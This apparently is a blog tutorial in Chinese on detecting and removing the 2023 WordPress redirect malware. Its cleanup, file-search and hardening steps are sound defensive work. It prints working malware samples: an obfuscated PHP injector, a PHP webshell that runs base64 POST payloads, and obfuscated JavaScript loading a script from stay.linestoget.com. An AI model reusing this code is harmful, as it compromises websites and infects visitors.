Fix Redirect WordPress Hack 2023（重定向病毒）

WordPress 它絕對是最常用的平台 CMS (Content Management System) 對於博客和入門在線商店（使用模塊 WooCommerce），這使其成為計算機攻擊（黑客攻擊）的最大目標。 最常用的黑客操作之一旨在將受感染的網站重定向到其他網頁。 Redirect WordPress Hack 2023 是一種相對較新的惡意軟件，其影響是將整個網站重定向到垃圾郵件網頁，或者進而感染用戶的計算機。

如果您的網站開發於 WordPress 如果被重定向到另一個站點，那麼它很可能是已經著名的重定向黑客的受害者。

在本教程中，您將找到必要的信息和有用的提示，通過它們可以對受重定向感染的網站進行反病毒處理 WordPress Hack (Virus Redirect)。 通過評論您可以獲得更多信息或尋求幫助。

檢測重定向站點的病毒 WordPress

網站流量突然且不合理地減少、訂單數量減少（對於在線商店）或廣告收入減少是出現問題的第一個跡象。 檢測“Redirect WordPress Hack 2023當您打開網站並將您重定向到另一個網頁時，也可以“直觀地”完成“（病毒重定向）”。

根據經驗，大多數網絡惡意軟件都與互聯網瀏覽器兼容： Chrome, Firefox, Edge, Opera。 如果您是電腦用戶 Mac，這些病毒在瀏覽器中並不真正可見 Safari。 安全系統來自 Safari 默默地阻止這些惡意腳本。

如果您的網站被感染該怎麼辦 Redirect WordPress Hack

我希望第一步不要驚慌或刪除該網站。 即使是受感染或病毒文件，一開始也不應刪除。 它們包含有價值的信息，可以幫助您了解安全漏洞的位置以及病毒的影響因素。 作案手法。

向公眾關閉網站。

如何向訪問者關閉病毒網站？ 最簡單的方法是使用 DNS 管理器並刪除“A”（域名）的 IP 或定義一個不存在的 IP。 因此，網站訪問者將受到保護。 redirect WordPress hack 這可能會導致他們訪問病毒或垃圾郵件網頁。

如果你使用 CloudFlare 作為 DNS 管理員，您登錄帳戶並刪除 DNS 記錄”A” 為域名。 因此，受病毒影響的域將仍然沒有 IP，無法再從 Internet 訪問。

您複製網站的 IP 並“路由”它，以便只有您可以訪問它。 從您的計算機。

如何更改電腦網站的真實IP Windows?

該方法通常用於通過編輯“hosts”文件來阻止對某些網站的訪問。

1.你打開 Notepad 或其他文字編輯器（具有權限 administrator）並編輯文件“hosts”。 它位於：

C:\Windows\System32\drivers\etc\hosts

2. 在“hosts”文件中，添加“route”到您網站的真實IP。 上面從 DNS 管理器中刪除了 IP。

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. 保存文件並在瀏覽器中訪問網站。

如果網站無法打開，並且您在“hosts”文件中沒有做任何錯誤，則很可能是 DNS 緩存造成的。

清除操作系統上的 DNS 緩存 Windows， 打開 Command Prompt，在其中運行命令：

ipconfig /flushdns

如何更改電腦網站的真實IP Mac / Mac書？

對於電腦用戶 Mac 更改網站的真實IP要簡單一些。

1. 打開實用程序 Terminal.

2.運行命令行（需要係統密碼才能運行）：

sudo nano /etc/hosts

3. 與計算機相同 Windows，添加域名的真實IP。

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. 保存更改。 Ctrl+X (y).

“路由”後，您是唯一可以通過以下方式訪問受感染網站的人： Redirect WordPress Hack.

完整網站備份 – 文件和數據庫

就算是感染了“redirect WordPress hack”，建議對整個網站進行一般備份。 文件和數據庫。 也許您還可以保存這兩個文件的本地副本 public / public_html 以及數據庫。

識別受感染的文件和被修改的文件 Redirect WordPress Hack 2023

主要目標文件 WordPress 有 index.php （在根中）， header.php, index.php 對 footer.php 主題的 WordPress 資產。 手動檢查這些文件並識別惡意代碼或惡意軟件腳本。

2023年，一種病毒“Redirect WordPress Hack” 放入 index.php 形式的代碼：

（我不建議運行這些代碼！）

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

解碼後，這個 惡意腳本 這基本上是網站被感染的結果 WordPress。 它不是惡意軟件背後的腳本，而是可以重定向受感染網頁的腳本。 如果我們解碼上面的腳本，我們會得到：

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

要識別服務器上包含此代碼的所有文件，最好具有訪問權限 SSH 到服務器上運行文件檢查和管理命令行 Linux.

相關新聞： 如何確定您的博客是否被感染，求助 Google Search 。 （WordPress 病毒）

下面的兩個命令絕對有助於識別最近修改的文件和包含特定代碼（字符串）的文件。

你怎麼看 Linux PHP 文件在過去 24 小時或其他時間範圍內發生了更改？

命令 ”find”使用起來非常簡單，並允許自定義設置時間段、搜索路徑和文件類型。

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

在輸出中，您將收到有關文件修改日期和時間、寫/讀/執行權限（chmod）以及它屬於哪個組/用戶。

如果您想檢查更多天前，請更改值“-mtime -1”或使用“-mmin -360”幾分鐘（6 小時）。

如何在PHP、Java文件中搜索代碼（字符串）？

“查找”命令行可以讓你快速查找包含特定代碼的所有 PHP 或 Java 文件，如下所示：

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

該命令將搜索並顯示文件 .php 對 .js 含有“uJjBRODYsU“。

借助上面兩個命令，您將非常容易地找出哪些文件最近被修改以及哪些文件包含惡意軟件​​代碼。

從修改的文件中刪除惡意代碼，而不影響正確的代碼。 在我的場景中，惡意軟件是在打開之前放置的 <head>.

當執行第一個“find”命令時，很有可能在服務器上發現不屬於您的新文件 WordPress 也不由你放在那裡。 屬於病毒類型的文件 Redirect WordPress Hack.

在我調查的場景中，“wp-log-nOXdgD.php”。 這些是“生成”文件，還包含病毒用於重定向的惡意軟件代碼。

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

類型文件的用途“wp-log-*”的目的是將重定向黑客病毒傳播到服務器上託管的其他網站。 這是一種“webshell” 組成一個 基礎部分 （其中定義了一些加密變量）和o 執行部分 攻擊者試圖通過它在系統上加載並執行惡意代碼。

如果有一個變量 POST 名為'bh' 及其加密值 MD5 等於“8f1f964a4b4d8d1ac3f0386693d28d03”，然後腳本出現寫入加密內容 base64 另一個名為 ' 的變量b3' 在臨時文件中，然後嘗試包含此臨時文件。

如果有一個變量 POST 或 GET 名為'tick'，腳本將響應該值 MD5 字符串“885“。

要識別服務器上包含此代碼的所有文件，請選擇一個常見的字符串，然後運行命令“find”（與上面的類似）。 刪除包含此惡意軟件代碼的所有文件.

安全漏洞被利用 Redirect WordPress Hack

該重定向病毒很可能通過 利用管理用戶 WordPress 或通過識別 易受攻擊的插件 它允許添加具有以下權限的用戶 administrator.

對於大多數在該平台上構建的網站 WordPress 有可能的 編輯主題或插件文件從管理界面（Dashboard）。 因此，惡意者可以將惡意軟件代碼添加到主題文件中以生成上面所示的腳本。

此類惡意軟件代碼的示例如下：

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript 在主題標題中標識 WordPress, 打開標籤後立即 <head>.

破譯此 JavaScript 相當困難，但很明顯，它會查詢另一個網址，最有可能從該網址獲取其他腳本來創建文件”wp-log-*我在上面談到過。

從所有文件中查找並刪除此代碼 PHP 做作的。

據我所知，這段代碼是 手動添加 由具有管理權限的新用戶。

因此，為了防止從儀表板添加惡意軟件，最好禁用編輯選項 WordPress 儀表板中的主題/插件。

編輯文件 wp-config.php 並添加以下行：

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

進行此更改後，沒有用戶 WordPress 您將無法再從儀表板編輯文件。

檢查角色為的用戶 Administrator

下面是一個 SQL 查詢，您可以使用它來搜索具有以下角色的用戶 administrator 在平台中 WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

該查詢將返回表中的所有用戶 wp_users 誰分配了角色 administrator。 查詢也針對錶完成 wp_usermeta 在元中搜索'wp_capabilities'，其中包含有關用戶角色的信息。

另一種方法是通過以下方式識別它們： Dashboard → Users → All Users → Administrator。 但是，有些做法可以將用戶隱藏在儀表板面板中。 所以，看到用戶的最好方式”Administrator“以 WordPress 就是上面的SQL命令。

就我而言，我在數據庫中識別出名為“的用戶”wp-import-user”。 很有啟發性。

您還可以從這裡看到用戶的日期和時間 WordPress 被創建。 用戶 ID 也非常重要，因為它會搜索服務器日誌。 這樣您就可以看到該用戶的所有活動。

刪除角色為的用戶 administrator 那麼你不知道 更改密碼 給所有管理用戶。 編輯、作者、 Administrator.

修改SQL數據庫用戶密碼 受影響的網站。

採取這些步驟後，可以為所有用戶重新啟動網站。

但請記住，我上面介紹的可能是網站被感染的數千種情況之一 Redirect WordPress Hack 2023年。

如果您的網站已被感染並且需要幫助或有任何疑問，請開放評論部分。